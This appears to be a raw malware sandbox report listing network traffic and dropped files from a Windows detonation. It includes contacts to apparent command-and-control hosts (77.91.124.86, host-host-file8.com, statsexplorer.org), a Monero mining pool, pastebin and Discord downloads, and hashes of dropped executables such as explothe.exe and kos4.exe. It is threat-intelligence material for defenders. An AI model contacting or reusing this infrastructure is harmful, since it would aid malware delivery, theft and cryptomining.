US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
US 8.8.8.8:53 static.doubleclick.net udp
NL 142.250.179.138:443 jnn-pa.googleapis.com tcp
NL 142.251.36.6:443 static.doubleclick.net tcp
NL 142.250.179.138:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 138.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 api.twitter.com udp
US 104.244.42.2:443 api.twitter.com tcp
US 104.244.42.2:443 api.twitter.com tcp
US 8.8.8.8:53 login.steampowered.com udp
US 8.8.8.8:53 2.42.244.104.in-addr.arpa udp
JP 23.207.106.113:443 login.steampowered.com tcp
US 8.8.8.8:53 facebook.com udp
IE 163.70.151.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
IE 163.70.151.35:443 fbcdn.net tcp
US 8.8.8.8:53 www.recaptcha.net udp
NL 172.217.168.227:443 www.recaptcha.net tcp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 227.168.217.172.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 c.paypal.com udp
US 8.8.8.8:53 www.paypalobjects.com udp
NL 172.217.168.227:443 www.recaptcha.net udp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 t.paypal.com udp
US 151.101.1.35:443 t.paypal.com tcp
US 192.55.233.1:443 tcp
US 192.55.233.1:443 tcp
US 8.8.8.8:53 35.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
US 8.8.8.8:53 28.26.214.95.in-addr.arpa udp
US 8.8.8.8:53 api.steampowered.com udp
JP 23.207.106.113:443 api.steampowered.com tcp
US 8.8.8.8:53 rr4---sn-aigzrnsr.googlevideo.com udp
GB 74.125.175.41:443 rr4---sn-aigzrnsr.googlevideo.com tcp
GB 74.125.175.41:443 rr4---sn-aigzrnsr.googlevideo.com tcp
GB 74.125.175.41:443 rr4---sn-aigzrnsr.googlevideo.com udp
US 8.8.8.8:53 41.175.125.74.in-addr.arpa udp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 b.stats.paypal.com udp
US 64.4.245.84:443 b.stats.paypal.com tcp
US 8.8.8.8:53 84.245.4.64.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 dub.stats.paypal.com udp
US 64.4.245.84:443 dub.stats.paypal.com tcp
US 8.8.8.8:53 71e81bc8-ad3f-427b-8387-a35193216e26.uuid.statsexplorer.org udp
US 8.8.8.8:53 2.214.58.216.in-addr.arpa udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
US 8.8.8.8:53 talon-website-prod.ecosec.on.epicgames.com udp
US 172.64.146.120:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 172.64.146.120:443 talon-website-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 120.146.64.172.in-addr.arpa udp
US 8.8.8.8:53 c6.paypal.com udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 51.68.143.81:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 81.143.68.51.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
FR 51.255.34.118:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 118.34.255.51.in-addr.arpa udp
US 8.8.8.8:53 server3.statsexplorer.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun3.l.google.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
SG 74.125.24.127:19302 stun3.l.google.com udp
US 8.8.8.8:53 127.24.125.74.in-addr.arpa udp
BG 185.82.216.108:443 server3.statsexplorer.org tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
DE 172.217.23.214:443 i.ytimg.com udp
US 8.8.8.8:53 rr3---sn-aigl6nzr.googlevideo.com udp
GB 74.125.175.136:443 rr3---sn-aigl6nzr.googlevideo.com udp
US 8.8.8.8:53 136.175.125.74.in-addr.arpa udp
NL 172.217.168.227:443 www.recaptcha.net udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
FI 77.91.124.86:19084 tcp
FI 77.91.124.86:19084 tcp
BG 185.82.216.108:443 server3.statsexplorer.org tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 talon-service-prod.ecosec.on.epicgames.com udp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 104.18.41.136:443 talon-service-prod.ecosec.on.epicgames.com tcp
US 8.8.8.8:53 136.41.18.104.in-addr.arpa udp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.218.90:443 js.hcaptcha.com tcp
US 8.8.8.8:53 90.218.19.104.in-addr.arpa udp
US 8.8.8.8:53 www.epicgames.com udp
US 8.8.8.8:53 newassets.hcaptcha.com udp
US 8.8.8.8:53 hcaptcha.com udp

Files

memory/4404-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4404-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3092-2-0x0000000002C20000-0x0000000002C36000-memory.dmp

memory/4404-4-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FFEB.exe

MD5 ac823b18cdfc844213f9fbb34bb67bf0
SHA1 817111f927d555e20bcb8b0836fce89245422a58
SHA256 6a383fb9c660d83f8ab842e957c61c21ad90f8d6c09abf5cec2beb312e0e316f
SHA512 3d719e7bcccb237b94c396557c48c84e6b0e99f3e616c4e6c1cdb03c3a37cf553549d840ac0c1ca6e795da4ba89430974caa6256e0fbad51b944fa8cf7ba2c55

C:\Users\Admin\AppData\Local\Temp\FFEB.exe

MD5 ac823b18cdfc844213f9fbb34bb67bf0
SHA1 817111f927d555e20bcb8b0836fce89245422a58
SHA256 6a383fb9c660d83f8ab842e957c61c21ad90f8d6c09abf5cec2beb312e0e316f
SHA512 3d719e7bcccb237b94c396557c48c84e6b0e99f3e616c4e6c1cdb03c3a37cf553549d840ac0c1ca6e795da4ba89430974caa6256e0fbad51b944fa8cf7ba2c55

C:\Users\Admin\AppData\Local\Temp\98.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\98.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe

MD5 94682ee76e54885b8e97b44e1494fa23
SHA1 c359277a6fcdc79fb5c05688a794b2b95b0beb53
SHA256 37079451d012d16698584b080008293295df5e5ceced91230677d6732544254c
SHA512 f228e143262a9809a5b9ee2c1a937f683acbd62fe19f6cbcc1ff34ad618ef42505ae14c880ae74bec047a18dd13a2c59248f5a392eb6203240429e4fc0a3012e

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe

MD5 94682ee76e54885b8e97b44e1494fa23
SHA1 c359277a6fcdc79fb5c05688a794b2b95b0beb53
SHA256 37079451d012d16698584b080008293295df5e5ceced91230677d6732544254c
SHA512 f228e143262a9809a5b9ee2c1a937f683acbd62fe19f6cbcc1ff34ad618ef42505ae14c880ae74bec047a18dd13a2c59248f5a392eb6203240429e4fc0a3012e

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe

MD5 f8b6f6d45103761916bbf5e70784000b
SHA1 80d22cec7131dabe6aa3ac3860e5e904dc6a268b
SHA256 460f01f64f627e51321b090eb6e00f4f617bb2d86026fd3badf2d0ede469bd88
SHA512 4b64cce565f9c0bd0dfc1d62c61311ca2eee435854092ec6e29025b5e9f40c564693bee8cd20edb2d704e1350136f797d95d6bfcc2de68f09e27a0323786b818

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe

MD5 f8b6f6d45103761916bbf5e70784000b
SHA1 80d22cec7131dabe6aa3ac3860e5e904dc6a268b
SHA256 460f01f64f627e51321b090eb6e00f4f617bb2d86026fd3badf2d0ede469bd88
SHA512 4b64cce565f9c0bd0dfc1d62c61311ca2eee435854092ec6e29025b5e9f40c564693bee8cd20edb2d704e1350136f797d95d6bfcc2de68f09e27a0323786b818

C:\Users\Admin\AppData\Local\Temp\28E.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\28E.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe

MD5 69970688e2d61adf515f1f16e0da6329
SHA1 48f360b8b704a922b9db7bbc2d056fcacf4fec83
SHA256 f1d19d2b3f63e7bc32d329628ebe7e811396b9e9281ae9f3c56174b0bd3bd519
SHA512 51c7d50609ca547c7e998a819d4fa5f1b2433fb603a9a05106b50f8c8ca88bc19c160715e6b105d5e5ea56590226896f2bb2d4ffd881618de1cd5b2f27bacea6

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe

MD5 69970688e2d61adf515f1f16e0da6329
SHA1 48f360b8b704a922b9db7bbc2d056fcacf4fec83
SHA256 f1d19d2b3f63e7bc32d329628ebe7e811396b9e9281ae9f3c56174b0bd3bd519
SHA512 51c7d50609ca547c7e998a819d4fa5f1b2433fb603a9a05106b50f8c8ca88bc19c160715e6b105d5e5ea56590226896f2bb2d4ffd881618de1cd5b2f27bacea6

C:\Users\Admin\AppData\Local\Temp\1D2.bat

MD5 e79bae3b03e1bff746f952a0366e73ba
SHA1 5f547786c869ce7abc049869182283fa09f38b1d
SHA256 900e53f17f7c9a2753107b69c30869343612c1be7281115f3f78d17404af5f63
SHA512 c67a9a5a366be8383ad5b746c54697c71dbda712397029bc8346b7c52dd71a7d41be3d35159de35c44a3b8755d9ce94acda08d12ff105263559adb6a6d0baf50

C:\Users\Admin\AppData\Local\Temp\36A.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\36A.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe

MD5 ddb27a2829a841eb0e0fbd67e7b04379
SHA1 2d76b3dde715064c98e3d746dde1f305d3b493ad
SHA256 256453003dbc0eed50b3f8387ae1fbb62c656450ba262f5b4a7b0f24693ab8a0
SHA512 84f5db377aa5375ab5fd58fa4dfd9e3a249ae18a1c8334fc934a8a100412397e780ae3ce74d840d687eea990c2cc556659d70a8213116c2e6d81e24a53d94e03

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe

MD5 ddb27a2829a841eb0e0fbd67e7b04379
SHA1 2d76b3dde715064c98e3d746dde1f305d3b493ad
SHA256 256453003dbc0eed50b3f8387ae1fbb62c656450ba262f5b4a7b0f24693ab8a0
SHA512 84f5db377aa5375ab5fd58fa4dfd9e3a249ae18a1c8334fc934a8a100412397e780ae3ce74d840d687eea990c2cc556659d70a8213116c2e6d81e24a53d94e03

memory/3160-61-0x00000000006D0000-0x00000000006DA000-memory.dmp

memory/1764-63-0x0000000000710000-0x000000000074E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4B3.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\4B3.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe

MD5 c3d1a4cf8748f119f267df767d6c1ebc
SHA1 c2e899f5bd523ce21d0065c66d216692d5e7b5eb
SHA256 53e6d18e2bc30d0348368c63cca6bd106cf793b81492735faaaf90444ddbb501
SHA512 8200f5aacb8ccc9679d9b628440109bd1839e21713ef3d86ff76b026ed75573439c9f6b0cff88857134d916642b8ae7da0b0d19d75ca3e052c88fcba6f9cef49

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe

MD5 c3d1a4cf8748f119f267df767d6c1ebc
SHA1 c2e899f5bd523ce21d0065c66d216692d5e7b5eb
SHA256 53e6d18e2bc30d0348368c63cca6bd106cf793b81492735faaaf90444ddbb501
SHA512 8200f5aacb8ccc9679d9b628440109bd1839e21713ef3d86ff76b026ed75573439c9f6b0cff88857134d916642b8ae7da0b0d19d75ca3e052c88fcba6f9cef49

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/3160-72-0x0000000073190000-0x0000000073940000-memory.dmp

memory/1764-73-0x0000000073190000-0x0000000073940000-memory.dmp

memory/1764-74-0x0000000007A40000-0x0000000007FE4000-memory.dmp

memory/1764-77-0x0000000007530000-0x00000000075C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\793.exe

MD5 e506a24a96ce9409425a4b1761374bb1
SHA1 27455f1cd65d796ba50397f06aa4961b7799e98a
SHA256 880265cb3889dd109ac84a6756367ae56b73b483343a84a42fb35d16c816ec71
SHA512 6e3bf3ba5a551d4f46130b42f41e3c36ec29024acd3ef05d95c31edc207378800d31137a27e975e6bd9e09ae41feabd197db920404972449132912478b0ad612

memory/1764-84-0x0000000007750000-0x0000000007760000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\793.exe

MD5 e506a24a96ce9409425a4b1761374bb1
SHA1 27455f1cd65d796ba50397f06aa4961b7799e98a
SHA256 880265cb3889dd109ac84a6756367ae56b73b483343a84a42fb35d16c816ec71
SHA512 6e3bf3ba5a551d4f46130b42f41e3c36ec29024acd3ef05d95c31edc207378800d31137a27e975e6bd9e09ae41feabd197db920404972449132912478b0ad612

memory/1764-89-0x00000000074E0000-0x00000000074EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/4184-90-0x0000000000400000-0x0000000000480000-memory.dmp

memory/1764-91-0x0000000008610000-0x0000000008C28000-memory.dmp

memory/1764-92-0x0000000007870000-0x000000000797A000-memory.dmp

memory/4184-94-0x0000000000560000-0x00000000005BA000-memory.dmp

memory/1764-93-0x0000000007760000-0x0000000007772000-memory.dmp

memory/1764-99-0x0000000007800000-0x000000000784C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\793.exe

MD5 e506a24a96ce9409425a4b1761374bb1
SHA1 27455f1cd65d796ba50397f06aa4961b7799e98a
SHA256 880265cb3889dd109ac84a6756367ae56b73b483343a84a42fb35d16c816ec71
SHA512 6e3bf3ba5a551d4f46130b42f41e3c36ec29024acd3ef05d95c31edc207378800d31137a27e975e6bd9e09ae41feabd197db920404972449132912478b0ad612

C:\Users\Admin\AppData\Local\Temp\793.exe

MD5 e506a24a96ce9409425a4b1761374bb1
SHA1 27455f1cd65d796ba50397f06aa4961b7799e98a
SHA256 880265cb3889dd109ac84a6756367ae56b73b483343a84a42fb35d16c816ec71
SHA512 6e3bf3ba5a551d4f46130b42f41e3c36ec29024acd3ef05d95c31edc207378800d31137a27e975e6bd9e09ae41feabd197db920404972449132912478b0ad612

memory/4184-103-0x0000000073190000-0x0000000073940000-memory.dmp

memory/1764-97-0x00000000077C0000-0x00000000077FC000-memory.dmp

memory/968-105-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0629525c94f6548880f5f3a67846755e
SHA1 40ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256 812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512 f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2RN726JK.exe

MD5 c5f8e0cac60230151e2540831b235b39
SHA1 fed81c8d8fd79f41f738480dfa00b10e9460c325
SHA256 9d0fd57b3dd48a666672b399f7345c9d4404a203d6843acd7e044926706109a8
SHA512 b6239572d6fdc00cc45e99acf4dabe9ffa4701677a1f1d0f80a0a5804020955c95f39eb8e246d834ccc472c04c84a2507be6ccdefcdc0b5ce8862295de2d0a71

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2RN726JK.exe

MD5 c5f8e0cac60230151e2540831b235b39
SHA1 fed81c8d8fd79f41f738480dfa00b10e9460c325
SHA256 9d0fd57b3dd48a666672b399f7345c9d4404a203d6843acd7e044926706109a8
SHA512 b6239572d6fdc00cc45e99acf4dabe9ffa4701677a1f1d0f80a0a5804020955c95f39eb8e246d834ccc472c04c84a2507be6ccdefcdc0b5ce8862295de2d0a71

memory/968-109-0x0000000000400000-0x0000000000434000-memory.dmp

memory/968-106-0x0000000000400000-0x0000000000434000-memory.dmp

memory/968-104-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3712-118-0x0000000073190000-0x0000000073940000-memory.dmp

memory/3712-117-0x0000000000760000-0x000000000079E000-memory.dmp

memory/3712-119-0x00000000074B0000-0x00000000074C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2240.exe

MD5 f99fa1c0d1313b7a5dc32cd58564671d
SHA1 0e3ada17305b7478bb456f5ad5eb73a400a78683
SHA256 8a964d8fb52489ba9086bf0ab5cf8ca7822fe698d03e5e6d5174640f52b8c5ee
SHA512 bbee03761f2ffe4ab99d3e2dd02f49460b1100583ceb0e06f2765eff776d3167880a8dbbb8079c659d39fc3cc8e24dfdd8395ced3eeb6a13ef598ba8b9269a25

C:\Users\Admin\AppData\Local\Temp\2240.exe

MD5 f99fa1c0d1313b7a5dc32cd58564671d
SHA1 0e3ada17305b7478bb456f5ad5eb73a400a78683
SHA256 8a964d8fb52489ba9086bf0ab5cf8ca7822fe698d03e5e6d5174640f52b8c5ee
SHA512 bbee03761f2ffe4ab99d3e2dd02f49460b1100583ceb0e06f2765eff776d3167880a8dbbb8079c659d39fc3cc8e24dfdd8395ced3eeb6a13ef598ba8b9269a25

memory/3160-124-0x0000000073190000-0x0000000073940000-memory.dmp

memory/5028-131-0x0000000000C70000-0x0000000001654000-memory.dmp

memory/5028-133-0x0000000073190000-0x0000000073940000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\255E.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\255E.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

memory/4184-145-0x0000000073190000-0x0000000073940000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0629525c94f6548880f5f3a67846755e
SHA1 40ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256 812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512 f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa

memory/4184-137-0x0000000000400000-0x0000000000480000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_4020_CQDBBYWJQTBAJAGS

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e2ba53a69e955d805bc61d9f50ed4a17
SHA1 8386666de18bb0dbc0f4170ecae73034f7cb5be8
SHA256 387dca9f589bc11eed39cb57769439fcc889583229fe6e7809aa12fb2d5748b2
SHA512 6e562434250ab6b296cb19f6fb80351b89a8d1af42ceead441aa9385af2aafa7892d0fd92a9a2993dfea11e2cc4d26819c9e394848e401d07ee1809d5b7251ca

memory/1764-151-0x0000000073190000-0x0000000073940000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/5296-195-0x0000000000AD0000-0x0000000000AD8000-memory.dmp

memory/3160-198-0x0000000073190000-0x0000000073940000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/5296-204-0x000000001B700000-0x000000001B710000-memory.dmp

